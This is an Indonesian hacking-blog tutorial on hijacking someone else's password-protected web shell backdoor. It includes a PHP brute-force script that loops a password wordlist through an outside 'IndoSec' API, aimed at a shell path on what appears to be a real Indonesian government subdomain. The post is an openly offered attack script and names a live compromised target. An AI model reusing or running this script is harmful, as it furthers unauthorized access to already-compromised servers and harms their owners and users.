{ IndoSec }

Create, Securing, and Exploit

Senin, 24 Desember 2018

Cara Tykung Shell Backdoor

Cara Tykung Shell Backdoor yg terPassword


Hallo bedebah aweokaoewk :V gk usah baper gan.

yaaa di video kali ini, admin-kece akan memberikan tutorial buat nykung shell yg terpassword, kecuali mini shell krena emng gk ada password nya _-

nahh jadi tutorial ini untuk shell yg kepassword aja yahh, bisa langsung di tykung gaes, method yg digunakan adalah ngebrote, yaaap betul menebak password. ok cekidot

Langkah : 

1. Kita akan memanfaatkan API dari IndoSec atau bisa cek disini => https://indosec.web.id/api/doc

2. Kita siapkan bahasa program yg mau kita pakai, disini ainx contohin pakai PHP (Pemberi harapan pasti)

3. kita harus tau request sama response dari API nya dulu, bisa di baca di documentasi tadi yaaa

4. kita butuh wordlist untuk itu kita buat file.txt yg isi nya adalah kumpulan-kumpulan password, yang nantinya kita akan brute ok

5. ok langsung kita menuju kodingan

 <?php
   
    $files = file_get_contents('hash.txt'); //nama file wordlist
    $file  = explode("\r\n", $files);

    foreach ($file as $key) {
      
        $params = "?type=shell&url=dpmpptsp.sumutprov.go.id/simpelpaten/idx.php&name=password&value=$key";

        $cek = file_get_contents("http://indosec.web.id/api/brute.php" . $params);

        $data = json_decode($cek);
        // kondisi ketika shell berhasil
        if ($data->status == 'success') {
            echo "[+] Password => $data->password_shell \n";
            break;
        }else{
            echo "[-] Password Tidak Ditemukan | $key -\n";
        }
    }

?>

6. kita langsung running saja ok, dan jangan lupa untuk mengganti parameter url dan name nya oky :')

7.dan tadaaaa, Shell mu tertykung mass aweokawoek :v



dan seperti itulah tadi, cara menykung shell orang yg kepassword, buat kalian yg masih bingung kalian bisa langsung tonton di youtube IndoSec yaaa
ini link nya gaes DISINI. jangan lupa share Artikel/Tutorial ini yaa, agar shell kalian sendiri tidak tertykung sma orang lain oky :') Byeee

 


Tidak ada komentar:

Posting Komentar

Popular Posts